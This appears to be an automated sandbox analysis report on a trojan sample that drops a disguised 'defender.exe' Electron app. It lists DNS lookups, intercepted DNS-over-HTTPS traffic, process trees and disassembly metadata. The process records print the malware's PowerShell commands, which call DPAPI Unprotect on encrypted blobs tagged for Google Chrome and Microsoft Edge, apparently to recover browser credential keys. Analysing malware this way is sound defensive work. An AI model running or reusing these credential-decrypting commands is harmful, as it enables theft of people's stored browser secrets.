                                                                    Aug 4, 2024 16:23:54.323359013 CEST1.1.1.1192.168.2.70xc615No error (0)setekshome.com185.111.234.27A (IP address)IN (0x0001)false
                                                                    Aug 4, 2024 16:24:14.065613985 CEST1.1.1.1192.168.2.70xaefbNo error (0)ws-eu.pusher.comsocket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                    Aug 4, 2024 16:24:14.065613985 CEST1.1.1.1192.168.2.70xaefbNo error (0)socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com52.30.21.185A (IP address)IN (0x0001)false
                                                                    Aug 4, 2024 16:24:14.065613985 CEST1.1.1.1192.168.2.70xaefbNo error (0)socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com52.51.219.31A (IP address)IN (0x0001)false
                                                                    Aug 4, 2024 16:24:14.065613985 CEST1.1.1.1192.168.2.70xaefbNo error (0)socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com54.220.102.164A (IP address)IN (0x0001)false
                                                                    Aug 4, 2024 16:24:14.065613985 CEST1.1.1.1192.168.2.70xaefbNo error (0)socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com52.17.118.218A (IP address)IN (0x0001)false
                                                                    Aug 4, 2024 16:24:14.065613985 CEST1.1.1.1192.168.2.70xaefbNo error (0)socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com54.171.33.24A (IP address)IN (0x0001)false
                                                                    Aug 4, 2024 16:24:14.065613985 CEST1.1.1.1192.168.2.70xaefbNo error (0)socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com63.33.78.190A (IP address)IN (0x0001)false
                                                                    Aug 4, 2024 16:24:16.067498922 CEST1.1.1.1192.168.2.70xe8aeNo error (0)sockjs-eu.pusher.comingress-sticky-haproxy-eu-da5b7868dc470a9a.elb.eu-west-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                    Aug 4, 2024 16:24:16.067498922 CEST1.1.1.1192.168.2.70xe8aeNo error (0)ingress-sticky-haproxy-eu-da5b7868dc470a9a.elb.eu-west-1.amazonaws.com52.48.38.99A (IP address)IN (0x0001)false
                                                                    Aug 4, 2024 16:24:16.067498922 CEST1.1.1.1192.168.2.70xe8aeNo error (0)ingress-sticky-haproxy-eu-da5b7868dc470a9a.elb.eu-west-1.amazonaws.com54.216.83.132A (IP address)IN (0x0001)false
                                                                    Aug 4, 2024 16:24:16.067498922 CEST1.1.1.1192.168.2.70xe8aeNo error (0)ingress-sticky-haproxy-eu-da5b7868dc470a9a.elb.eu-west-1.amazonaws.com99.81.234.0A (IP address)IN (0x0001)false
                                                                    Aug 4, 2024 16:24:21.287096024 CEST1.1.1.1192.168.2.70x56c2No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                    Aug 4, 2024 16:24:21.287096024 CEST1.1.1.1192.168.2.70x56c2No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                    Aug 4, 2024 16:24:21.287175894 CEST1.1.1.1192.168.2.70x6bNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                    Aug 4, 2024 16:24:21.350507975 CEST1.1.1.1192.168.2.70x736cNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                    Aug 4, 2024 16:24:21.350507975 CEST1.1.1.1192.168.2.70x736cNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                    Aug 4, 2024 16:24:21.350742102 CEST1.1.1.1192.168.2.70x7141No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                    Aug 4, 2024 16:24:31.071904898 CEST1.1.1.1192.168.2.70x1fcNo error (0)sockjs-eu.pusher.comingress-sticky-haproxy-eu-da5b7868dc470a9a.elb.eu-west-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                    Aug 4, 2024 16:24:31.071904898 CEST1.1.1.1192.168.2.70x1fcNo error (0)ingress-sticky-haproxy-eu-da5b7868dc470a9a.elb.eu-west-1.amazonaws.com99.81.234.0A (IP address)IN (0x0001)false
                                                                    Aug 4, 2024 16:24:31.071904898 CEST1.1.1.1192.168.2.70x1fcNo error (0)ingress-sticky-haproxy-eu-da5b7868dc470a9a.elb.eu-west-1.amazonaws.com52.48.38.99A (IP address)IN (0x0001)false
                                                                    Aug 4, 2024 16:24:31.071904898 CEST1.1.1.1192.168.2.70x1fcNo error (0)ingress-sticky-haproxy-eu-da5b7868dc470a9a.elb.eu-west-1.amazonaws.com54.216.83.132A (IP address)IN (0x0001)false
                                                                    Aug 4, 2024 16:25:14.073774099 CEST1.1.1.1192.168.2.70x7eddNo error (0)stats.pusher.comclientstats1-dummy-server-lb-398743415.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                    Aug 4, 2024 16:25:14.073774099 CEST1.1.1.1192.168.2.70x7eddNo error (0)clientstats1-dummy-server-lb-398743415.us-east-1.elb.amazonaws.com3.222.214.216A (IP address)IN (0x0001)false
                                                                    Aug 4, 2024 16:25:14.073774099 CEST1.1.1.1192.168.2.70x7eddNo error (0)clientstats1-dummy-server-lb-398743415.us-east-1.elb.amazonaws.com54.92.189.105A (IP address)IN (0x0001)false

                                                                    HTTP Request Dependency Graph

                                                                    • chrome.cloudflare-dns.com

                                                                    HTTPS Proxied Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.749722162.159.61.34435484C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-08-04 14:24:21 UTC245OUTPOST /dns-query HTTP/1.1
                                                                    Host: chrome.cloudflare-dns.com
                                                                    Connection: keep-alive
                                                                    Content-Length: 128
                                                                    Accept: application/dns-message
                                                                    Accept-Language: *
                                                                    User-Agent: Chrome
                                                                    Accept-Encoding: identity
                                                                    Content-Type: application/dns-message
                                                                    2024-08-04 14:24:21 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    Data Ascii: wwwgstaticcom)TP
                                                                    2024-08-04 14:24:21 UTC247INHTTP/1.1 200 OK
                                                                    Server: cloudflare
                                                                    Date: Sun, 04 Aug 2024 14:24:21 GMT
                                                                    Content-Type: application/dns-message
                                                                    Connection: close
                                                                    Access-Control-Allow-Origin: *
                                                                    Content-Length: 468
                                                                    CF-RAY: 8adf35e89e307c99-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2024-08-04 14:24:21 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 08 00 04 8e fa 41 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    Data Ascii: wwwgstaticcomA)


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.749723172.64.41.34435484C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-08-04 14:24:21 UTC245OUTPOST /dns-query HTTP/1.1
                                                                    Host: chrome.cloudflare-dns.com
                                                                    Connection: keep-alive
                                                                    Content-Length: 128
                                                                    Accept: application/dns-message
                                                                    Accept-Language: *
                                                                    User-Agent: Chrome
                                                                    Accept-Encoding: identity
                                                                    Content-Type: application/dns-message
                                                                    2024-08-04 14:24:21 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    Data Ascii: wwwgstaticcom)TP
                                                                    2024-08-04 14:24:21 UTC247INHTTP/1.1 200 OK
                                                                    Server: cloudflare
                                                                    Date: Sun, 04 Aug 2024 14:24:21 GMT
                                                                    Content-Type: application/dns-message
                                                                    Connection: close
                                                                    Access-Control-Allow-Origin: *
                                                                    Content-Length: 468
                                                                    CF-RAY: 8adf35e918355e70-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2024-08-04 14:24:21 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 e3 00 04 8e fb 20 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    Data Ascii: wwwgstaticcom c)


                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Target ID:0
                                                                    Start time:10:23:20
                                                                    Start date:04/08/2024
                                                                    Path:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe"
                                                                    Imagebase:0x400000
                                                                    File size:69'484'987 bytes
                                                                    MD5 hash:A4590450863F13AA67198EC0FE52453E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:12
                                                                    Start time:11:34:53
                                                                    Start date:04/08/2024
                                                                    Path:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    Imagebase:0x7ff7ed8a0000
                                                                    File size:162'041'856 bytes
                                                                    MD5 hash:050F6E0968C055E912AB6CA8DC12A881
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 0%, ReversingLabs
                                                                    Reputation:low
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:15
                                                                    Start time:11:34:57
                                                                    Start date:04/08/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                    Imagebase:0x7ff6a2d50000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:16
                                                                    Start time:11:34:57
                                                                    Start date:04/08/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff75da10000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:17
                                                                    Start time:11:34:57
                                                                    Start date:04/08/2024
                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:tasklist
                                                                    Imagebase:0x7ff708e80000
                                                                    File size:106'496 bytes
                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:18
                                                                    Start time:11:34:58
                                                                    Start date:04/08/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                    Imagebase:0x7ff6a2d50000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:19
                                                                    Start time:11:34:58
                                                                    Start date:04/08/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,143,231,151,3,164,155,252,199,5,180,234,105,60,58,208,131,221,113,254,201,212,101,30,157,201,120,66,49,155,81,94,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,173,81,165,103,189,238,23,248,169,143,199,131,217,35,105,8,51,181,214,59,46,122,49,169,137,191,37,150,80,49,185,106,48,0,0,0,227,139,161,48,25,1,188,206,13,98,179,209,192,72,44,5,18,32,19,98,83,88,171,61,245,160,191,68,245,147,93,58,123,23,22,100,2,113,63,61,199,163,161,49,20,0,140,172,64,0,0,0,90,215,150,92,233,132,172,0,218,254,112,142,82,73,108,164,141,2,37,168,239,176,249,140,163,197,218,17,138,244,133,244,159,52,96,225,196,138,64,250,229,2,196,46,182,11,157,172,93,116,47,87,27,148,67,58,76,10,131,216,69,102,175,138), $null, 'CurrentUser')"
                                                                    Imagebase:0x7ff6a2d50000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:20
                                                                    Start time:11:34:58
                                                                    Start date:04/08/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff75da10000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:21
                                                                    Start time:11:34:58
                                                                    Start date:04/08/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff75da10000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:22
                                                                    Start time:11:34:58
                                                                    Start date:04/08/2024
                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:tasklist
                                                                    Imagebase:0x7ff708e80000
                                                                    File size:106'496 bytes
                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:23
                                                                    Start time:11:34:58
                                                                    Start date:04/08/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,143,231,151,3,164,155,252,199,5,180,234,105,60,58,208,131,221,113,254,201,212,101,30,157,201,120,66,49,155,81,94,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,173,81,165,103,189,238,23,248,169,143,199,131,217,35,105,8,51,181,214,59,46,122,49,169,137,191,37,150,80,49,185,106,48,0,0,0,227,139,161,48,25,1,188,206,13,98,179,209,192,72,44,5,18,32,19,98,83,88,171,61,245,160,191,68,245,147,93,58,123,23,22,100,2,113,63,61,199,163,161,49,20,0,140,172,64,0,0,0,90,215,150,92,233,132,172,0,218,254,112,142,82,73,108,164,141,2,37,168,239,176,249,140,163,197,218,17,138,244,133,244,159,52,96,225,196,138,64,250,229,2,196,46,182,11,157,172,93,116,47,87,27,148,67,58,76,10,131,216,69,102,175,138), $null, 'CurrentUser')
                                                                    Imagebase:0x7ff741d30000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:24
                                                                    Start time:11:35:05
                                                                    Start date:04/08/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,162,33,177,8,149,91,236,191,129,249,33,231,27,148,12,171,122,36,70,244,154,79,73,117,181,20,143,206,1,195,45,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,168,140,205,238,188,26,206,16,147,216,104,102,249,250,177,217,113,177,11,10,219,34,181,223,104,67,90,97,29,67,135,198,48,0,0,0,111,7,27,76,231,128,167,166,236,58,4,205,90,176,104,112,26,199,93,23,90,122,68,151,214,153,146,80,144,62,95,230,165,147,143,143,143,124,118,123,23,62,207,33,112,187,137,178,64,0,0,0,245,94,155,216,109,45,241,53,9,114,77,116,165,235,237,86,72,111,74,87,234,83,100,234,81,1,43,5,153,85,142,192,206,173,232,251,142,136,182,197,146,115,49,120,202,240,22,246,11,50,180,177,166,7,64,202,99,182,23,130,212,30,228,156), $null, 'CurrentUser')"
                                                                    Imagebase:0x7ff6a2d50000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:25
                                                                    Start time:11:35:05
                                                                    Start date:04/08/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff604cd0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:26
                                                                    Start time:11:35:05
                                                                    Start date:04/08/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,162,33,177,8,149,91,236,191,129,249,33,231,27,148,12,171,122,36,70,244,154,79,73,117,181,20,143,206,1,195,45,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,168,140,205,238,188,26,206,16,147,216,104,102,249,250,177,217,113,177,11,10,219,34,181,223,104,67,90,97,29,67,135,198,48,0,0,0,111,7,27,76,231,128,167,166,236,58,4,205,90,176,104,112,26,199,93,23,90,122,68,151,214,153,146,80,144,62,95,230,165,147,143,143,143,124,118,123,23,62,207,33,112,187,137,178,64,0,0,0,245,94,155,216,109,45,241,53,9,114,77,116,165,235,237,86,72,111,74,87,234,83,100,234,81,1,43,5,153,85,142,192,206,173,232,251,142,136,182,197,146,115,49,120,202,240,22,246,11,50,180,177,166,7,64,202,99,182,23,130,212,30,228,156), $null, 'CurrentUser')
                                                                    Imagebase:0x7ff741d30000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:28
                                                                    Start time:11:35:17
                                                                    Start date:04/08/2024
                                                                    Path:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\defender" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1832 --field-trial-handle=1804,i,2169737662434373633,7221801736705868447,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
                                                                    Imagebase:0x7ff7ed8a0000
                                                                    File size:162'041'856 bytes
                                                                    MD5 hash:050F6E0968C055E912AB6CA8DC12A881
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:29
                                                                    Start time:11:35:17
                                                                    Start date:04/08/2024
                                                                    Path:C:\Windows\explorer.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                    Imagebase:0x7ff70ffd0000
                                                                    File size:5'141'208 bytes
                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:30
                                                                    Start time:11:35:19
                                                                    Start date:04/08/2024
                                                                    Path:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\defender" --mojo-platform-channel-handle=2132 --field-trial-handle=1804,i,2169737662434373633,7221801736705868447,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
                                                                    Imagebase:0x7ff7ed8a0000
                                                                    File size:162'041'856 bytes
                                                                    MD5 hash:050F6E0968C055E912AB6CA8DC12A881
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:31
                                                                    Start time:11:35:20
                                                                    Start date:04/08/2024
                                                                    Path:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Roaming\defender" --app-path="C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\resources\app.asar" --no-sandbox --no-zygote --first-renderer-process --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --time-ticks-at-unix-epoch=-1722781275767759 --launch-time-ticks=4443586976 --mojo-platform-channel-handle=2360 --field-trial-handle=1804,i,2169737662434373633,7221801736705868447,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1
                                                                    Imagebase:0x7ff7ed8a0000
                                                                    File size:162'041'856 bytes
                                                                    MD5 hash:050F6E0968C055E912AB6CA8DC12A881
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Disassembly

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:2.4%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:100%
                                                                      Total number of Nodes:7
                                                                      Total number of Limit Nodes:0
                                                                      execution_graph 1977 7ffaab7d4b42 1978 7ffaab7d50d0 CryptUnprotectData 1977->1978 1980 7ffaab7d5183 1978->1980 1973 7ffaab7d4fee 1974 7ffaab7d500a 1973->1974 1975 7ffaab7d5107 CryptUnprotectData 1974->1975 1976 7ffaab7d5183 1975->1976

                                                                      Executed Functions

                                                                      Function 00007FFAAB7D4FEE Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 221encryptionCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1652323334.00007FFAAB7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab7d0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID: CryptDataUnprotect
                                                                      • String ID: 6`$0Wj
                                                                      • API String ID: 834300711-3614157630
                                                                      • Opcode ID: 2703d216786699126ca12185e824e6f78f26b489a15ddce77a456afff9eb7ce7
                                                                      • Instruction ID: 99939db400369a95a6272818ab5ba1088675207bfbd9dd8475830101702ae259
